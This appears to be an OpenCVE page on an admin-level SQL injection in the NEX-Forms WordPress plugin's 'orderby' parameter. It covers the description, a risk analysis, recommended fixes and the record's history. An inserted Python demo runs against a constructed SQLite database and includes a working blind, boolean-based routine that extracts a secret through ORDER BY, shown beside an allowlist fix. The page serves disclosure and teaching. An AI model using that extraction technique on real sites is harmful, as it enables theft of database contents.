Description
The NEX-Forms – Ultimate Forms Plugin for WordPress plugin for WordPress is vulnerable to SQL Injection via the 'orderby' parameter in the action nf_load_form_entries in all versions up to, and including, 9.1.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This may be exploitable by lower-level users if access is granted by a site administrator.
Published: 2025-10-11
Score: 4.9 Medium
EPSS: < 1% Very Low
KEV: No
Impact: SQL Injection
Action: Patch
AI Analysis

Impact

The NEX-Forms – Ultimate Forms Plugin for WordPress is vulnerable to SQL Injection via the 'orderby' parameter in the nf_load_form_entries action. The parameter is inserted into an existing query without sufficient escaping or preparation, so an authenticated attacker with Administrator-level privileges (or a lower-level user to whom an administrator has granted access to the action) can append arbitrary SQL to the query. The vulnerability is a classic SQL Injection flaw (CWE-89); the CVSS vector rates the confidentiality impact high with no integrity or availability impact, which matches its use for exfiltrating sensitive data from the database rather than modifying it.

Affected Systems

The flaw affects the Webaways NEX-Forms – Ultimate Forms Plugin for WordPress in all versions up to and including 9.1.6. A site running an affected release is exposed to any account that can reach the nf_load_form_entries action, which by default means Administrator-level accounts and above.

Risk and Exploitability

With a CVSS 3.1 base score of 4.9 (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N) the vulnerability is of medium severity; the high-privilege requirement (PR:H) keeps the score down despite the high confidentiality impact. Its EPSS score of less than 1% indicates a very low estimated probability of exploitation in the wild, and the flaw is not listed in the CISA KEV catalog. Exploitation requires an authenticated account, typically an administrator; if a site administrator grants lower-level users access to the form-entries action, the set of accounts able to exploit the flaw grows accordingly. Consequently, while an attacker who can already log in with administrator rights could read data beyond what the plugin itself exposes, the likelihood of exploitation remains comparatively low.

Generated by OpenCVE AI on April 21, 2026 at 02:25 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update the NEX-Forms plugin to a release newer than 9.1.6 as soon as one is available; all versions up to and including 9.1.6 are affected, and no fix or workaround is recorded on this page.
  • Restrict Administrator privileges to trusted personnel and review role and capability assignments so that lower-level users are not granted access to the form-entries action.
  • Until a fixed release is installed, consider application-layer defenses such as a web application firewall rule that rejects 'orderby' values for the nf_load_form_entries action that are not plain column names; this reduces but does not remove the exposure.

Generated by OpenCVE AI on April 21, 2026 at 02:25 UTC.
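The Impact paragraph above describes the flaw class (a client-supplied 'orderby' value spliced into an existing query) and the recommended actions describe the fix (only accept known column names). The following Python example is added here to illustrate both; it is not the plugin's code, the page does not show the plugin's actual query, and the table names, column names, charset and the secret value are all constructed for the demonstration. It uses SQLite so that it runs offline, and goes one step beyond the text by showing how a blind, boolean-based extraction works when the only thing under attacker control is the ORDER BY clause: the row order becomes the oracle.

```python
import sqlite3
import string

# Constructed sample data: a stand-in for a form-entries table plus a second
# table holding a value the entries endpoint should never reveal. This is not
# the plugin's real schema; the page does not show the plugin's query.
SAMPLE_ENTRIES = [
    (1, "alice", "2025-10-01"),
    (2, "bob", "2025-10-03"),
    (3, "carol", "2025-10-02"),
]
SAMPLE_SECRET = "s3cr3t-api-key"

# Allowlists for the hardened variant: identifiers cannot be bound as query
# parameters, so the only safe way to take a sort column from the client is to
# compare it against known column names (hypothetical names, not the plugin's).
ALLOWED_ORDERBY = {"id", "name", "created"}
ALLOWED_DIRECTION = {"ASC", "DESC"}


def build_db():
    """Create an in-memory SQLite database with the constructed sample data."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE entries (id INTEGER, name TEXT, created TEXT)")
    con.executemany("INSERT INTO entries VALUES (?, ?, ?)", SAMPLE_ENTRIES)
    con.execute("CREATE TABLE options (name TEXT, value TEXT)")
    con.execute("INSERT INTO options VALUES ('api_key', ?)", (SAMPLE_SECRET,))
    return con


def load_entries_vulnerable(con, orderby):
    """The flaw class: the client-controlled sort column is pasted into the SQL text."""
    sql = "SELECT id, name FROM entries ORDER BY " + orderby
    return [row[1] for row in con.execute(sql)]


def load_entries_hardened(con, orderby, direction="ASC"):
    """Same query with the sort column and direction checked against allowlists."""
    if orderby not in ALLOWED_ORDERBY:
        raise ValueError(f"rejected orderby value: {orderby!r}")
    direction = direction.upper()
    if direction not in ALLOWED_DIRECTION:
        raise ValueError(f"rejected sort direction: {direction!r}")
    # Both fragments are now guaranteed to be one of a few fixed strings.
    sql = f"SELECT id, name FROM entries ORDER BY {orderby} {direction}"
    return [row[1] for row in con.execute(sql)]


def leak_secret_via_orderby(con, max_len=32,
                            charset=string.ascii_lowercase + string.digits + "-"):
    """Blind, boolean-based extraction through the vulnerable ORDER BY.

    Each probe sorts by a CASE expression: when the guessed byte of the secret
    is right the rows come back in ascending id order (first name "alice"),
    otherwise in descending order (first name "carol"). The attacker never sees
    the secret directly; the row order is the oracle.
    """
    recovered = ""
    for pos in range(1, max_len + 1):
        for guess in charset:
            probe = (
                "(CASE WHEN substr((SELECT value FROM options WHERE name='api_key'),"
                f" {pos}, 1) = '{guess}' THEN id ELSE -id END)"
            )
            if load_entries_vulnerable(con, probe)[0] == "alice":
                recovered += guess
                break
        else:
            # No candidate matched: substr() past the end returns '', so we are done.
            break
    return recovered


if __name__ == "__main__":
    db = build_db()
    print("legitimate sort:", load_entries_vulnerable(db, "created"))
    print("recovered via ORDER BY oracle:", leak_secret_via_orderby(db))
    try:
        load_entries_hardened(db, "(CASE WHEN 1=1 THEN id ELSE -id END)")
    except ValueError as exc:
        print("hardened variant:", exc)
```

In the plugin's own PHP context the same constraint applies: `$wpdb->prepare()` binds values, not identifiers, so escaping the 'orderby' string does not help a query that needs it as a column name. The fix for this pattern in WordPress code is to compare the incoming value against a fixed list of column names (for example with `in_array()`) and to constrain the direction to ASC or DESC before the query string is built, exactly as the hardened function above does.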


Advisories

No advisories yet.

History

Tue, 21 Oct 2025 13:15:00 +0000

Type                 Values Removed   Values Added
First Time appeared                   Webaways
                                      Webaways nex-forms-ultimate-forms-plugin
                                      Wordpress
                                      Wordpress wordpress
Vendors & Products                    Webaways
                                      Webaways nex-forms-ultimate-forms-plugin
                                      Wordpress
                                      Wordpress wordpress

Tue, 14 Oct 2025 15:15:00 +0000

Type      Values Removed   Values Added
Metrics                    ssvc
                           {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Sat, 11 Oct 2025 07:30:00 +0000

Type          Values Removed   Values Added
Description                    The NEX-Forms – Ultimate Forms Plugin for WordPress plugin for WordPress is vulnerable to SQL Injection via the 'orderby' parameter in the action nf_load_form_entries in all versions up to, and including, 9.1.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This may be exploitable by lower-level users if access is granted by a site administrator.
Title                          NEX-Forms – Ultimate Forms Plugin for WordPress <= 9.1.6 - Authenticated (Admin+) SQL Injection
Weaknesses                     CWE-89
References
Metrics                        cvssV3_1
                               {'score': 4.9, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N'}


Subscriptions

Webaways Nex-forms-ultimate-forms-plugin
Wordpress Wordpress
MITRE

Status: PUBLISHED

Assigner: Wordfence

Published:

Updated: 2026-04-08T17:30:13.145Z

Reserved: 2025-09-09T15:11:39.813Z

Link: CVE-2025-10185

Vulnrichment

Updated: 2025-10-14T13:31:06.349Z

NVD

Status : Deferred

Published: 2025-10-11T08:15:31.790

Modified: 2026-04-15T00:35:42.020

Link: CVE-2025-10185

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-21T02:30:25Z

Weaknesses